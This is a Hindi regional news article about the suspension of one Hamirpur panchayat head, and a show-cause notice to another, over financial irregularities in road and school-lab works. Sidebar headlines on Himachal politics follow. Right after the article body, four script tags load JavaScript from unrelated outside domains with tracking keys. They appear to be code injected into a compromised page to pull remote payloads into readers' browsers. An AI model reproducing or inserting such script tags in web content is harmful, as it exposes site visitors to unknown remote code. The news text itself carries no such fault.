Categories: हिमाचल

हमीरपुर में दो पंचायतों के प्रधानों पर गिरी गाज, पद से किया सस्पेंड

<p>जिला हमीरपुर की दो पंचायतों की प्रधान पर विभागीय कार्रवाई की गाज गिरी है। विकास खंड बमसन के तहत ग्राम पंचायत टपरे की प्रधान को नियमों के विपरीत पंचायत में कार्य करवाने के आरोप में डीसी हमीरपुर हरिकेश मीणा ने सस्पेंड किया है। गौरतलब है कि प्रधान के खिलाफ दी गई शिकायत में कहा गया था कि पंचायत प्रधान ने 14वें वित्तायोग के तहत मिली धनराशि से लोक निर्माण विभाग के मंडल कार्यालय टौणी देवी से श्मशानघाट तक रास्ते का निर्माण करवाया। लेकिन बिना एस्टिमेट प्लान, बिना कमेटी और बिना असेसमेंट के ही संबंधित ठेकेदार को भुगतान कर दिया गया। शिकायत पर जांच संबंधित खंड विकास अधिकारी ने की और आरोपों को सही पाया जिसके बाद उपायुक्त हमीरपुर ने पंचायत प्रधान को उनके पद से सस्पेंड कर दिया है।</p>

<p>वहीं, दूसरे मामले में विकास खंड नादौन के तहत आती ग्राम पंचायत गोइस के प्रधान को भी वित्तीय अनियमितता के चलते कारण बताओ नोटिस जारी किया गया है। प्रधान पर पंचायत में रास्ते के निर्माण और स्कूल लैब के निर्माण के दौरान नियमों की अवहेलना करने के आरोप लगे थे, जिसकी जांच एसडीएम ने की है। जांच में आरोप सही पाए गए। इन मुद्दों पर दोनों पंचायत के प्रधानों ने आरोपों को निराधार बताते हुए इसे राजनीति से प्रेरित कार्रवाई बताया है।</p>

<p>उधर, पंचायत प्रधान रजनीश कुमारी ने कहा है कि उन्हें अभी आदेश के बारे कोई जानकारी नहीं मिली है। उन्होंने इसके खिलाफ कोर्ट में चुनौती देने की बात कही है। जिला पंचायत अधिकारी हमीरपुर रमेश कपूर ने कहा कि टपरे पंचायत की प्रधान को सस्पेंड किया गया है, जबकि नादौन ब्लॉक की गोइस पंचायत के प्रधान को भी अलग मामले में कारण बताओ नोटिस जारी किया।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573796317741″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

जय राम ठाकुर ने विधानसभा में दी भगवान को चुनौती : सीएम

भरमौर (चंबा): चंबा जिले के भरमौर में चुनावी जनसभा को सम्बोधित करते हुए मुख्यमंत्री ठाकुर…

4 mins ago

देशवासी सिर्फ़ नरेन्द्र मोदी को ही प्रधानमंत्री बनाने के लिए उत्सुक है: जयराम ठाकुर

शिमला : नेता प्रतिपक्ष जयराम ठाकुर ने कहा कि भारतवासी  नरेन्द्र मोदी को तीसरी बार…

7 mins ago

हिमाचल प्रदेश में चल रही है मित्रों की सरकार: डॉ. राजीव भारद्वाज

कांगड़ा-चंबा लोकसभा भाजपा प्रत्याशी डॉ. राजीव भारद्वाज ने कहा की हिमाचल प्रदेश में मित्रों की…

12 mins ago

किसानों के मुद्दों को प्राथमिकता में शामिल करने वालों को समर्थन देगा संयुक्त किसान

लोकसभा चुनाव को लेकर हिमाचल में किसानो के विभिन्न संगठनों ने संयुक्त किसान मंच के…

21 mins ago

सुक्खू सरकार की गलत नीतियों से हिमाचल से बड़े बड़े उद्योगों का हुआ पलायन

हिमाचल प्रदेश में पिछले 16 महीने के कांग्रेस सरकार के कार्यकाल में उद्योगों का प्रदेश…

25 mins ago

डॉ यशवंत सिंह परमार की 44 वी पुण्यतिथि , कांग्रेस कार्यालय में दी श्रद्धाजंलि

हिमाचल निर्माता व प्रथम मुख्यमंत्री डॉ यशवंत सिंह परमार की 44वी पुण्यतिथि पर प्रदेश भर…

3 hours ago